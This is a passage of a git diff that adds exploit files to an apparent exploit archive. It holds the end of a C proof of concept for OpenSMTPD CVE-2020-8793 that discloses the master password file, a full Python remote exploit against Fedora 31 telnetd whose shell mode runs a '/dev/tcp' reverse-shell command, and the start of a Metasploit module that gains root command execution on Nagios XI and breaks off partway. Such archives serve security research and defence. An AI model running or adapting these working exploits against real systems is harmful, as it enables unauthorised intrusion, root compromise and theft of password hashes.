+                            if (n_stopped > ((size_t)1 << 20)) die();
+                            n_stopped += ((size_t)1 << 10);
+                            stopped = reallocarray(stopped, n_stopped, sizeof(*stopped));
+                            if (stopped == NULL) die();
+                        }
+                        if (i_stopped >= n_stopped) die();
+                        stopped[i_stopped] = strdup(av[ac]);
+                        if (stopped[i_stopped] == NULL) die();
+                        i_stopped++;
+                    }
+                    const size_t len = strlen(av[ac]) + 1;
+                    if (write(fd, &pid, sizeof(pid)) != (ssize_t)sizeof(pid)) die();
+                    if (write(fd, av[ac], len) != (ssize_t)len) die();
+                    break;
+                default:
+                    die();
+                }
+                break;
+            }
+        }
+    }
+    die();
+}
+
+static void
+kill_stopper(const t_stopper stopper)
+{
+    kill_wait(stopper.pid);
+    if (close(stopper.fd) != 0) die();
+}
+
+typedef struct {
+    int kill;
+    pid_t pid;
+    char * args;
+} t_stopped;
+
+static t_stopped
+wait_stopped(const t_stopper stopper)
+{
+    pid_t pid = 0;
+    if (read(stopper.fd, &pid, sizeof(pid)) != (ssize_t)sizeof(pid)) die();
+    if (pid <= 0) die();
+
+    static char buf[ARG_MAX];
+    size_t len = 0;
+    for (;;) {
+        if (len >= sizeof(buf)) die();
+        const ssize_t nbr = read(stopper.fd, buf + len, 1);
+        if (nbr <= 0) die();
+        len += nbr;
+        if (buf[len - 1] == '\0') break;
+    }
+    if (len <= 0) die();
+    if (memchr(buf, '\0', len) != buf + len - 1) die();
+
+    char * const args = strdup(buf);
+    if (args == NULL) die();
+    const t_stopped stopped = { .kill = stopper.stop, .pid = pid, .args = args };
+    return stopped;
+}
+
+static void
+kill_free_stopped(const t_stopped stopped)
+{
+    if (stopped.kill && kill(stopped.pid, SIGKILL) != 0) die();
+    free(stopped.args);
+}
+
+static void
+make_stopper_file(const char * const file)
+{
+    const off_t file_size = (off_t)1 << 30;
+    const off_t line_size = (off_t)1 << 20;
+
+    struct stat sb;
+    if (lstat(file, &sb) != 0) die();
+    if (!S_ISREG(sb.st_mode)) die();
+    if (sb.st_size <= 0) die();
+    if (sb.st_size >= line_size) {
+        if (sb.st_size > file_size) return;
+        die();
+    }
+
+    const int fd = open(file, O_WRONLY | O_NOFOLLOW, 0);
+    if (fd <= -1) die();
+    off_t l;
+    for (l = 1; l <= file_size / line_size; l++) {
+        if (lseek(fd, line_size, SEEK_END) <= l * line_size) die();
+        if (write(fd, "\n", 1) != 1) die();
+    }
+    if (close(fd) != 0) die();
+}
+
+static size_t
+find_stopped_file(const char * const * const files, const size_t n_files,
+    const t_stopped stopped)
+{
+    size_t f;
+    for (f = 0; f < n_files; f++) {
+        if (strcmp(files[f], stopped.args) == 0) {
+            if (f >= n_files - 1) die();
+            return f;
+        }
+    }
+    die();
+}
+
+static void
+disclose_masterpasswd(const size_t n_files)
+{
+    if (getuid() == 0) die();
+    const char * const * const files = create_files(n_files);
+    size_t i;
+    for (i = 0; i < n_files - 1; i++) {
+        make_stopper_file(files[i]);
+    }
+
+    t_stopped queue_stopped[OFFLINE_QUEUEMAX];
+    size_t t = 0;
+    size_t q;
+    const t_stopper queue_stopper = fork_stopper(getuid());
+    puts("ready");
+
+    for (q = 0; q < OFFLINE_QUEUEMAX; q++) {
+        queue_stopped[q] = wait_stopped(queue_stopper);
+        const size_t f = find_stopped_file(files, n_files, queue_stopped[q]);
+        printf("%zu (%zu)\n", f, q);
+        if (f >= t) t = f + 1;
+    }
+    kill_stopper(queue_stopper);
+    if (t < OFFLINE_QUEUEMAX) die();
+    if (t >= n_files - 1) die();
+
+    wait_sentinel(files, n_files);
+
+    for (i = 0; i < n_files - 1; i++) {
+        if (unlink(files[i]) != 0) die();
+        if (i < t) continue;
+        if (link(_PATH_MASTERPASSWD, files[i]) != 0) die();
+
+        const pid_t pid = fork();
+        if (pid <= -1) die();
+        if (pid == 0) {
+            char * const argv[] = { "/usr/bin/chpass", NULL };
+            char * const envp[] = { "EDITOR=echo '#' >>", NULL };
+            execve(argv[0], argv, envp);
+            die();
+        }
+
+        int status = 0;
+        if (waitpid(pid, &status, 0) != pid) die();
+        if (!WIFEXITED(status)) die();
+        if (WEXITSTATUS(status) != 0) die();
+
+        struct stat sb;
+        if (lstat(files[i], &sb) != 0) die();
+        if (!S_ISREG(sb.st_mode)) die();
+        if (sb.st_nlink != 1) die();
+        if (sb.st_uid != 0) die();
+    }
+
+    const t_stopper target_dumper = fork_stopper(0);
+    for (q = 0; q < OFFLINE_QUEUEMAX; q++) {
+        kill_free_stopped(queue_stopped[q]);
+    }
+    const t_stopped target_dump = wait_stopped(target_dumper);
+    puts(target_dump.args);
+    kill_free_stopped(target_dump);
+    kill_stopper(target_dumper);
+
+    for (i = t; i < n_files - 1; i++) {
+        if (unlink(files[i]) != 0) die();
+    }
+    exit(EXIT_SUCCESS);
+}
+
+static void
+make_stopper_files(const char * const * const files, const size_t n_files,
+    const size_t begin_stoppers, const size_t n_stoppers)
+{
+    if (begin_stoppers >= n_files) die();
+    if (n_stoppers > OFFLINE_QUEUEMAX) die();
+
+    const size_t end_stoppers = begin_stoppers + 3 * n_stoppers;
+    if (end_stoppers >= n_files) die();
+
+    size_t f;
+    for (f = begin_stoppers; f < end_stoppers; f++) {
+        make_stopper_file(files[f]);
+    }
+}
+
+typedef struct {
+    pid_t pid;
+    int fd;
+} t_swapper;
+
+static t_swapper
+fork_swapper(const char * const target, const char * const file)
+{
+    struct stat sb;
+    if (lstat(target, &sb) != 0) die();
+    if (!S_ISREG(sb.st_mode)) die();
+    if (sb.st_nlink != 1) die();
+
+    int fds[2];
+    if (pipe(fds) != 0) die();
+    const pid_t pid = fork();
+    if (pid <= -1) die();
+
+    const int fd = fds[!pid];
+    if (close(fds[!!pid]) != 0) die();
+
+    if (pid != 0) {
+        const t_swapper swapper = { .pid = pid, .fd = fd };
+        return swapper;
+    }
+
+    if (unlink(file) != 0) die();
+    if (write(fd, "A", 1) != 1) die();
+
+    for (;;) {
+        if (link(target, file) != 0) die();
+        if (unlink(file) != 0) die();
+    }
+    die();
+}
+
+static void
+wait_swapper(const t_swapper swapper)
+{
+    char buf[] = "whatever";
+    if (read(swapper.fd, buf, sizeof(buf)) != 1) die();
+    if (buf[0] != 'A') die();
+}
+
+static void
+kill_swapper(const t_swapper swapper)
+{
+    kill_wait(swapper.pid);
+    if (close(swapper.fd) != 0) die();
+}
+
+static void
+disclose_deadletter(const size_t n_files, const char * const target)
+{
+    struct stat target_sb;
+    if (target[0] != '/') die();
+    if (lstat(target, &target_sb) != 0) die();
+    if (!S_ISREG(target_sb.st_mode)) die();
+    if (target_sb.st_nlink != 1) die();
+
+    const uid_t target_uid = target_sb.st_uid;
+    if (target_uid == getuid()) die();
+    const struct passwd * const target_pw = getpwuid(target_uid);
+    if (target_pw == NULL) die();
+
+    static char deadletter[PATH_MAX];
+    snprintf(deadletter, sizeof(deadletter), "%s/dead.letter", target_pw->pw_dir);
+    struct stat deadletter_sb;
+    if (lstat(deadletter, &deadletter_sb) != 0) {
+        if (errno != ENOENT) die();
+        memset(&deadletter_sb, 0, sizeof(deadletter_sb));
+    }
+
+    const char * const * const files = create_files(n_files);
+    make_stopper_files(files, n_files, 0, OFFLINE_QUEUEMAX);
+    const t_stopper queue_stopper = fork_stopper(getuid());
+    puts("ready");
+
+    t_stopped queue_stopped[OFFLINE_QUEUEMAX];
+    size_t t = 0;
+    size_t q;
+    for (q = 0; q < OFFLINE_QUEUEMAX; q++) {
+        queue_stopped[q] = wait_stopped(queue_stopper);
+        const size_t f = find_stopped_file(files, n_files, queue_stopped[q]);
+        printf("%zu (%zu)\n", f, q);
+        if (f >= t) t = f + 1;
+    }
+    if (t < OFFLINE_QUEUEMAX) die();
+    if (t >= n_files - 1) die();
+
+    size_t i;
+    for (i = 0; i < t; i++) {
+        if (unlink(files[i]) != 0) die();
+    }
+
+    wait_sentinel(files, n_files);
+    const t_stopper target_dumper = fork_stopper(target_uid);
+
+    for (;;) {
+        make_stopper_files(files, n_files, t + 1, 1);
+        const t_swapper swapper = fork_swapper(target, files[t]);
+        wait_swapper(swapper);
+        kill_free_stopped(queue_stopped[0]);
+        queue_stopped[0] = wait_stopped(queue_stopper);
+        kill_swapper(swapper);
+
+        const size_t f = find_stopped_file(files, n_files, queue_stopped[0]);
+        printf("%zu\n", f);
+        if (f <= t) die();
+        for (i = t; i <= f; i++) {
+            if (unlink(files[i]) != 0) {
+                if (errno != ENOENT) die();
+                if (i != t) die();
+            }
+        }
+        t = f + 1;
+
+        struct stat sb;
+        if (lstat(deadletter, &sb) != 0) {
+            if (errno != ENOENT) die();
+            memset(&sb, 0, sizeof(sb));
+        }
+        if (memcmp(&sb, &deadletter_sb, sizeof(sb)) != 0) break;
+    }
+    kill_stopper(queue_stopper);
+
+    const t_stopped target_dump = wait_stopped(target_dumper);
+    puts(target_dump.args);
+    kill_free_stopped(target_dump);
+    kill_stopper(target_dumper);
+
+    for (i = t; i < n_files - 1; i++) {
+        if (unlink(files[i]) != 0) die();
+    }
+    for (q = 0; q < OFFLINE_QUEUEMAX; q++) {
+        kill_free_stopped(queue_stopped[q]);
+    }
+
+    char * const argv[] = { "/bin/ls", "-l", deadletter, NULL };
+    char * const envp[] = { NULL };
+    execve(argv[0], argv, envp);
+    die();
+}
+
+int
+main(const int argc, const char * const argv[])
+{
+    setlinebuf(stdout);
+    puts("Local information disclosure in OpenSMTPD (CVE-2020-8793)");
+    puts("Copyright (C) 2020 Qualys, Inc.");
+
+    if (argc <= 1) die();
+    const size_t n_files = strtoul(argv[1], NULL, 0);
+    if (n_files <= OFFLINE_QUEUEMAX) die();
+    if (n_files > ((size_t)1 << 20)) die();
+
+    if (argc == 2) {
+        disclose_masterpasswd(n_files);
+        die();
+    }
+    if (argc == 3) {
+        disclose_deadletter(n_files, argv[2]);
+        die();
+    }
+    die();
+}
\ No newline at end of file
diff --git a/exploits/linux/remote/48170.py b/exploits/linux/remote/48170.py
new file mode 100755
index 000000000..fe3df1813
--- /dev/null
+++ b/exploits/linux/remote/48170.py
@@ -0,0 +1,406 @@
+#!/usr/bin/env python3
+#
+# BraveStarr
+# ==========
+#
+# Proof of Concept remote exploit against Fedora 31 netkit-telnet-0.17 telnetd.
+#
+# This is for demonstration purposes only.  It has by no means been engineered
+# to be reliable: 0xff bytes in addresses and inputs are not handled, and a lot
+# of other constraints are not validated.
+#
+# AppGate (C) 2020 / Ronald Huizer / @ronaldhuizer
+#
+import argparse
+import base64
+import fcntl
+import gzip
+import socket
+import struct
+import sys
+import termios
+import time
+
+class BraveStarr(object):
+    SE   = 240  # 0xf0
+    DM   = 242  # 0xf2
+    AO   = 245  # 0xf5
+    SB   = 250  # 0xfa
+    WILL = 251  # 0xfb
+    WONT = 252  # 0xfc
+    DO   = 253  # 0xfd
+    IAC  = 255  # 0xff
+
+    TELOPT_STATUS   = 5
+    TELOPT_TTYPE    = 24
+    TELOPT_NAWS     = 31
+    TELOPT_TSPEED   = 32
+    TELOPT_XDISPLOC = 35
+    TELOPT_ENVIRON  = 39
+
+    TELQUAL_IS    = 0
+    TELQUAL_SEND  = 1
+    TELQUAL_INFO  = 2
+
+    NETIBUF_SIZE  = 8192
+    NETOBUF_SIZE  = 8192
+
+    # Data segment offsets of interesting variables relative to `netibuf'.
+    netibuf_deltas = {
+        'loginprg':         -34952,
+        'state_rcsid':      -34880,
+        'subpointer':       -34816,
+        'ptyslavefd':       -34488,
+        'environ':          -33408,
+        'state':            -33268,
+        'LastArgv':         -26816,
+        'Argv':             -26808,
+        'remote_host_name': -26752,
+        'pbackp':           -9232,
+        'nbackp':            8192
+    }
+
+    def __init__(self, host, port=23, timeout=5, callback_host=None):
+        self.host    = host
+        self.port    = port
+        self.sd      = None
+        self.timeout = timeout
+
+        self.leak_marker = b"MARKER|MARKER"
+        self.addresses   = {}
+        self.values      = {}
+
+        if callback_host is not None:
+            self.chost = bytes(callback_host, 'ascii')
+
+    def fatal(self, msg):
+        print(msg, file=sys.stderr)
+        sys.exit(1)
+
+    def connect(self):
+        self.sd = socket.create_connection((self.host, self.port))
+
+        # Try to ensure the remote side will read a full 8191 bytes for
+        # `netobuf_fill' to work properly.
+        self.sd.setsockopt(socket.IPPROTO_TCP, socket.TCP_MAXSEG, 8191)
+
+    def address_delta(self, name1, name2):
+        return self.addresses[name1] - self.addresses[name2]
+
+    def address_serialize(self, name):
+        return struct.pack("<Q", self.addresses[name])
+
+    def ao(self):
+        return b"%c%c" % (self.IAC, self.AO)
+
+    def do(self, cmd):
+        return b"%c%c%c" % (self.IAC, self.DO, cmd)
+
+    def sb(self):
+        return b"%c%c" % (self.IAC, self.SB)
+
+    def se(self):
+        return b"%c%c" % (self.IAC, self.SE)
+
+    def will(self, cmd):
+        return b"%c%c%c" % (self.IAC, self.WILL, cmd)
+
+    def wont(self, cmd):
+        return b"%c%c%c" % (self.IAC, self.WONT, cmd)
+
+    def tx_flush(self):
+        while self.tx_len() != 0:
+            time.sleep(0.2)
+
+    def tx_len(self):
+        data = fcntl.ioctl(self.sd, termios.TIOCOUTQ, "    ")
+        return struct.unpack('i', data)[0]
+
+    def netobuf_fill(self, delta):
+        # This populates the prefix of `netobuf' with IAC WONT SB triplets.
+        # This is not relevant now, but during the next time data is sent and
+        # `netobuf' will be reprocessed in `netclear' will calls `nextitem'.
+        # The `nextitem' function will overindex past `nfrontp' and use these
+        # triplets in the processing logic.
+        s = self.do(self.SB) * delta
+
+        # IAC AO will cause netkit-telnetd to add IAC DM to `netobuf' and set
+        # `neturg' to the DM byte in `netobuf'.
+        s += self.ao()
+
+        # In this request, every byte in `netibuf' will store a byte in
+        # `netobuf'.  Here we ensure that all `netobuf' space is filled except
+        # for the last byte.
+        s += self.ao() * (3 - (self.NETOBUF_SIZE - len(s) - 1) % 3)
+
+        # We fill `netobuf' with the IAC DO IAC pattern.  The last IAC DO IAC
+        # triplet will write IAC to the last free byte of `netobuf'.  After
+        # this `netflush' will be called, and the DO IAC bytes will be written
+        # to the beginning of the now empty `netobuf'.
+        s += self.do(self.IAC) * ((self.NETOBUF_SIZE - len(s)) // 3)
+
+        # Send it out.  This should be read in a single read(..., 8191) call on
+        # the remote side.  We should probably tune the TCP MSS for this.
+        self.sd.sendall(s)
+
+        # We need to ensure this is written to the remote now.  This is a bit
+        # of a kludge, as the remote can perfectly well still merge the
+        # separate packets into a single read().  This is less likely as the
+        # time delay increases.  To do this properly we'd need to statefully
+        # match the responses to what we send.  Alack, this is a PoC.
+        self.tx_flush()
+
+    def reset_and_sync(self):
+        # After triggering the bug, we want to ensure that nbackp = nfrontp =
+        # netobuf We can do so by getting netflush() called, and an easy way to
+        # accomplish this is using the TELOPT_STATUS suboption, which will end
+        # with a netflush.
+        self.telopt_status()
+
+        # We resynchronize on the output we receive by loosely scanning if the
+        # TELOPT_STATUS option is there.  This is not a reliable way to do
+        # things.  Alack, this is a PoC.
+        s      = b""
+        status = b"%s%c" % (self.sb(), self.TELOPT_STATUS)
+        while status not in s and not s.endswith(self.se()):
+            s += self.sd.recv(self.NETOBUF_SIZE)
+
+    def telopt_status(self, mode=None):
+        if mode is None: mode = self.TELQUAL_SEND
+        s = b"%s%c%c%s" % (self.sb(), self.TELOPT_STATUS, mode, self.se())
+        self.sd.sendall(self.do(self.TELOPT_STATUS))
+        self.sd.sendall(s)
+
+    def trigger(self, delta, prefix=b"", suffix=b""):
+        assert b"\xff" not in prefix
+        assert b"\xff" not in suffix
+
+        s = prefix
+
+        # Add a literal b"\xff\xf0" to `netibuf'.  This will terminate the
+        # `nextitem' scanning for IAC SB sequences.
+        s += self.se()
+        s += self.do(self.IAC) * delta
+
+        # IAC AO will force a call to `netclear'.
+        s += self.ao()
+        s += suffix
+
+        self.sd.sendall(s)
+
+    def infoleak(self):
+        # We use a delta that creates a SB/SE item
+        delta = 512
+        self.netobuf_fill(delta)
+        self.trigger(delta, self.leak_marker)
+
+        s = b""
+        self.sd.settimeout(self.timeout)
+        while self.leak_marker not in s:
+            try:
+                ret = self.sd.recv(8192)
+            except socket.timeout:
+                self.fatal('infoleak unsuccessful.')
+                
+            if ret == b"":
+                self.fatal('infoleak unsuccessful.')
+            s += ret
+
+        return s
+
+    def infoleak_analyze(self, s):
+        m = s.rindex(self.leak_marker)
+        s = s[:m-20]    # Cut 20 bytes of padding off too.
+
+        # Layout will depend on build.  This works on Fedora 31.
+        self.values['net']     = struct.unpack("<I", s[-4:])[0]
+        self.values['neturg']  = struct.unpack("<Q", s[-12:-4])[0]
+        self.values['pfrontp'] = struct.unpack("<Q", s[-20:-12])[0]
+        self.values['netip']   = struct.unpack("<Q", s[-28:-20])[0]
+
+        # Resolve Fedora 31 specific addresses.
+        self.addresses['netibuf']  = (self.values['netip'] & ~4095) + 0x980
+        adjustment = len(max(self.netibuf_deltas, key=len))
+        for k, v in self.netibuf_deltas.items():
+            self.addresses[k] = self.addresses['netibuf'] + v
+
+    def _scratch_build(self, cmd, argv, envp):
+        # We use `state_rcsid' as the scratch memory area.  As this area is
+        # fairly small, the bytes after it on the data segment will likely
+        # also be used.  Nothing harmful is contained here for a while, so
+        # this is okay.
+        scratchpad  = self.addresses['state_rcsid']
+        exec_stub   = b"/bin/bash"
+        rcsid       = b""
+        data_offset = (len(argv) + len(envp) + 2) * 8
+
+        # First we populate all argv pointers into the scratchpad.
+        argv_address = scratchpad
+        for arg in argv:
+            rcsid       += struct.pack("<Q", scratchpad + data_offset)
+            data_offset += len(arg) + 1
+        rcsid += struct.pack("<Q", 0)
+
+        # Next we populate all envp pointers into the scratchpad.
+        envp_address = scratchpad + len(rcsid)
+        for env in envp:
+            rcsid       += struct.pack("<Q", scratchpad + data_offset)
+            data_offset += len(env) + 1
+        rcsid += struct.pack("<Q", 0)
+
+        # Now handle the argv strings.
+        for arg in argv:
+            rcsid += arg + b'\0'
+
+        # And the environment strings.
+        for env in envp:
+            rcsid += env + b'\0'
+
+        # Finally the execution stub command is stored here.
+        stub_address = scratchpad + len(rcsid)
+        rcsid       += exec_stub + b"\0"
+
+        return (rcsid, argv_address, envp_address, stub_address)
+
+    def _fill_area(self, name1, name2, d):
+        return b"\0" * (self.address_delta(name1, name2) - d)
+
+    def exploit(self, cmd):
+        env_user = b"USER=" + cmd
+        rcsid, argv, envp, stub = self._scratch_build(cmd, [b"bravestarr"], [env_user])
+
+        # The initial exploitation vector: this overwrite the area after
+        # `netobuf' with updated pointers values to overwrite `loginprg'
+        v  = struct.pack("<Q", self.addresses['netibuf'])  # netip
+        v += struct.pack("<Q", self.addresses['loginprg']) # pfrontp
+        v += struct.pack("<Q", 0)                          # neturg
+        v += struct.pack("<I", self.values['net'])         # net
+        v  = v.ljust(48, b'\0')                            # padding
+
+        self.netobuf_fill(len(v))
+        self.trigger(len(v), v + struct.pack('<Q', stub), b"A" * 8)
+        self.reset_and_sync()
+
+        s  = b""
+        s += self._fill_area('state_rcsid', 'loginprg', 8)
+        s += rcsid
+        s += self._fill_area('ptyslavefd', 'state_rcsid', len(rcsid))
+        s += struct.pack("<I", 5)
+        s += self._fill_area('environ', 'ptyslavefd', 4)
+        s += struct.pack("<Q", envp)
+        s += self._fill_area('LastArgv', 'environ', 8)
+        s += struct.pack("<Q", argv) * 2
+        s += self._fill_area('remote_host_name', 'LastArgv', 16)
+        s += b"-c\0"
+
+        self.sd.sendall(s)
+        self.tx_flush()
+
+        # We need to finish `getterminaltype' in telnetd and ensure `startslave' is
+        # called.
+        self.sd.sendall(self.wont(self.TELOPT_TTYPE))
+        self.sd.sendall(self.wont(self.TELOPT_TSPEED))
+        self.sd.sendall(self.wont(self.TELOPT_XDISPLOC))
+        self.sd.sendall(self.wont(self.TELOPT_ENVIRON))
+
+banner = """
+H4sICBThWF4CA2JsYQC1W0ly4zAMvPsLuegJ4i5VnjJv0P+vU44TRwTBbsBy5jBVikRiaywE6GX5
+s3+3+38f/9bj41/ePstnLMfz3f3PbP1kqW3xN32xx/kxxe55246Rbum/+dkCcKnx5mPi9BjSfTPJ
+pPwAva8VCmBg3qzQgdYaD0FD/US+J/rvITC+PP+lnkQCQOyoL4oMDhFUpM5F0Fee7UCUHlYEoAf/
+4Puw7t2zasMOcD2BAvFbomqkh3h2rxCvi+Ap5hnG53s8vB1sKj0JCzriRIrQ85jisSw+PY6hyrw8
+SDfC+g3toCYyqKenmA4VBrY4WC681Uif/OtGAnTIxwTBkxD8WEF3nEVfsDCP+5yedwvjzKx71nnt
+0BGJvDlTvnsDNSUOIgv+arD/c0GwkPqKaZIaUVxKDlM+Q8Pmsb8OSsF6FFYM64plS0XZAIYESSJm
+icYGkRMVoC2Mh8T3UOKUriTGUBhg2siCJgyZhZIz9ldqgnE53p6QHwlQhpuoxuiGOK1kup6I9A6Y
+ZlHvsA1iVYWwHSlUiaXQDSbfpOjAwN/MRTamLwLywQSBuEnZIEPMwnU9nAY/FnvSrOtrPolJDjyl
+zRMJNBG75yCeN/x9ViNt5wTBHakABFmkrSukxqL+jFvdI7MTX5l7n0s3UrjeWwp1x4DwOvFOXAuM
+6IyGuG4hqy0ByqDCp6hsIlRQNpcB6qr4ave8C4MFuWDDJijOeCVKsbKxYELrmDgmoUuY/hHh6WCe
+2FdJFUPzrSXgYyxKp2Hyy4yW8gsxgFRGqhr0Nc6A9lzmwIxUeuXLmc8g4SW+Vpq/XCVMocGJHixk
+kbha4l3fRXAcG9WzkS+I7DQDn+XZ8MmEBojsdJC8XaovVH15zkqWJLEYeobZG9sj7nIZgiVEfsB+
+l7Kr7JRlZTtcdUTIyVdMezN5oamjHZPessEpI5yCONsYqJ0lP2hK/csrOJQyi1GRvqPPF1+OqCbB
+/5DL2fKhoUUsGH2kYZRLUGWsS3mSk6nPoDYeNZLhFEpTIiwJDaYaCnGYw3/i5c3Y6obkZx1z1Kim
+3e4Yvc10wyTAPcn63hf1z2c6A63tGJOu2B7sCvbhUWcoQwIp3NLB2/CDdYX1Q8MOOsHQM2HfgIgi
+1H4NP9H086s3hz7AGv362oRkRIONaA3eoW7h0kSzzFSFNkbxBzLS9pro8AMJQambmJQNuyKkDXIu
+cEJOyyapKc8UQOUGMNOEL1U5ApEDqnp4Ly/QkCanBDasIXBl3ZeHRkbDvTEZvbImDCk4Zr2AhXYM
+NNZwZzvj48YgkH5GGVoLmfNGqGIlu2bhxVmNjZ0DRzdfFo+DqyYyma3kfEV6WymzQbbMuJLikOej
+peaYYdpu5l+UGAas3/Npxz97HUaPuLh4KsWHgCivEkn6gbbCE6QY9oIRX5jAZBgUZphTb2O+aDOs
+ddnFkPMp5vRSBfoZC9tJqCnUazDZyQRutd1mmtyJfY/rlM3XldWqezpXdDlnYQcMZ0MqsNwzva96
+e1nJAU/nh4s2qzPByQNHcKaw3dXuqNUx/q7kElF2shosB/Dr1nMNLoNvcpFhVBGvy364elss1JeE
+mQtDebG7+r/tyljmXBlfsh/t+OIgp4ymcFDjUZL1SNCkw5s5hly5MvrRnZo0TF4zmqOeUy4obBX3
+N/i0CGV+0k6SJ2SG+uFHBcPYI66H/bcUt9cdY/KKJmXS1IvBcMTQtLq8cg3sgkLUG+omTBLIRF8i
+k/gVorFb728qz/2e2FyRikg5j93vkct9S8/wo7A/YCVl28Fg+RvO7J1Fw6+73sqJ7Td6L1Oz/vrw
+r/a+S/cfKpbzJTo5AAA=
+"""
+
+parser = argparse.ArgumentParser(description="BraveStarr -- Remote Fedora 31 telnetd exploit")
+parser.add_argument('-H', '--hostname', dest='hostname', required=True,
+                    help='Target IP address or hostname')
+parser.add_argument('-p', '--port', dest='port', type=int, default=23,
+                    help='port number')
+parser.add_argument('-t', '--timeout', dest='timeout', type=int, default=10,
+                    help='socket timeout')
+
+method_parser = parser.add_subparsers(dest='method', help='Exploitation method')
+method_parser.required = True
+
+method_infoleak_parser = method_parser.add_parser('leak', help='Leaks memory of the remote process')
+
+method_cmd_parser = method_parser.add_parser('command', help='Executes a blind command on the remote')
+method_cmd_parser.add_argument('command', help='Command to execute')
+
+method_shell_parser = method_parser.add_parser('shell', help='Spawns a shell on the remote and connects back')
+method_shell_parser.add_argument('-c', '--callback', dest='callback', required=True, help='Host to connect back a shell to')
+
+args = parser.parse_args()
+
+for line in gzip.decompress(base64.b64decode(banner)).split(b"\n"):
+    sys.stdout.buffer.write(line + b"\n")
+    sys.stdout.buffer.flush()
+    time.sleep(0.1)
+
+t = BraveStarr(args.hostname, port=args.port, timeout=args.timeout,
+               callback_host=getattr(args, 'callback', None))
+
+print(f"\u26e4 Connecting to {args.hostname}:{args.port}")
+t.connect()
+
+# For the `shell' method, we set up a listening socket to receive the callback
+# shell on.
+if args.method == 'shell':
+    sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    sd.bind(('0.0.0.0', 12345))
+    sd.listen(1)
+
+s = t.infoleak()
+t.infoleak_analyze(s)
+
+print("\n\u26e4 Leaked variables")
+print(f"  netip  : {t.values['netip']:#016x}")
+print(f"  pfrontp: {t.values['pfrontp']:#016x}")
+print(f"  neturg : {t.values['neturg']:#016x}")
+print(f"  net    : {t.values['net']}")
+
+print("\n\u26e4 Resolved addresses")
+adjustment = len(max(t.netibuf_deltas, key=len))
+for k, v in t.netibuf_deltas.items():
+    print(f"  {k:<{adjustment}}: {t.addresses[k]:#016x}")
+
+if args.method == 'leak':
+    sys.exit(0)
+
+t.reset_and_sync()
+
+if args.method == 'shell':
+    t.exploit(b"/bin/bash -i >& /dev/tcp/%s/12345 0>&1" % t.chost)
+
+    print("\n\u26e4 Waiting for connect back shell")
+    if args.method == 'shell':
+        import telnetlib
+
+        tclient      = telnetlib.Telnet()
+        tclient.sock = sd.accept()[0]
+        tclient.interact()
+        sd.close()
+elif args.method == 'command':
+    print(f'\n\u26e4 Executing command "{args.command}"')
+    t.exploit(bytes(args.command, 'ascii'))
\ No newline at end of file
diff --git a/exploits/linux/remote/48191.rb b/exploits/linux/remote/48191.rb
new file mode 100755
index 000000000..52b5f42fb
--- /dev/null
+++ b/exploits/linux/remote/48191.rb
@@ -0,0 +1,294 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Nagios XI Authenticated Remote Command Execution',
+      'Description'     => %q{
+        This module exploits a vulnerability in Nagios XI before 5.6.6 in
+        order to execute arbitrary commands as root.
+
+        The module uploads a malicious plugin to the Nagios XI server and then
+        executes this plugin by issuing an HTTP GET request to download a
+        system profile from the server. For all supported targets except Linux
+        (cmd), the module uses a command stager to write the exploit to the
+        target via the malicious plugin. This may not work if Nagios XI is
+        running in a restricted Unix environment, so in that case the target
+        must be set to Linux (cmd). The module then writes the payload to the
+        malicious plugin while avoiding commands that may not be supported.
+
+        Valid credentials for a user with administrative privileges are
+        required. This module was successfully tested on Nagios XI 5.6.5
+        running on CentOS 7. The module may behave differently against older
+        versions of Nagios XI. See the documentation for more information.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Jak Gibb',       # https://github.com/jakgibb/ - Discovery and exploit
+          'Erik Wynter'     # @wyntererik - Metasploit
+        ],
+      'References'      =>
+        [
+          ['CVE', '2019-15949'],
+          ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] #original PHP exploit
+        ],
+      'Payload'        => { 'BadChars' => "\x00" },
+      'Targets'        =>
+        [
+          [ 'Linux (x86)', {
+            'Arch' => ARCH_X86,
+            'Platform' => 'linux',
+            'DefaultOptions' => {
+              'PAYLOAD'     => 'linux/x86/meterpreter/reverse_tcp'
+            }
+          } ],
+          [ 'Linux (x64)', {
+            'Arch' => ARCH_X64,
+            'Platform' => 'linux',
+            'DefaultOptions' => {
+              'PAYLOAD'     => 'linux/x64/meterpreter/reverse_tcp'
+            }
+          } ],
+          [ 'Linux (cmd)', {
+            'Arch' => ARCH_CMD,
+            'Platform' => 'unix',
+            'DefaultOptions' => {
+              'PAYLOAD'     => 'cmd/unix/reverse_bash'
+            },
+            'Payload' => {
+              'Append' => ' & disown',  # the payload must be disowned after execution, otherwise cleanup fails
+              'BadChars' => "\""
+            }
+          } ]
+        ],
+      'Privileged'      => true,
+      'DisclosureDate'  => 'Jul 29 2019',
+      'DefaultOptions'  => {
+        'RPORT' => 80,
+        'HttpClientTimeout' => 2, #This is needed to close the connection to the server following the system profile download request.
+        'WfsDelay'          => 10
+        },
+      'DefaultTarget'   => 1))
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base path to NagiosXI', '/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
+    ]
+
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false])
+    ]
+    import_target_defaults
+  end
+
+  def check
+    vprint_status("Running check")
+
+    #visit Nagios XI login page to obtain the nsp value required for authentication
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '/nagiosxi/login.php')
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 200 && res.body.include?('Nagios XI')
+      return CheckCode::Safe('Target is not a Nagios XI application.')
+    end
+
+    @nsp = res.body.scan(/nsp_str = "([a-z0-9]+)/).flatten.first rescue ''
+
+    if @nsp.to_s.eql? ''
+      return CheckCode::NoAccess, 'Could not retrieve nsp value, making authentication impossible.'
+    end
+
+    #Attempt to authenticate
+    @username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    cookie = res.get_cookies.delete_suffix(';') #remove trailing semi-colon
+
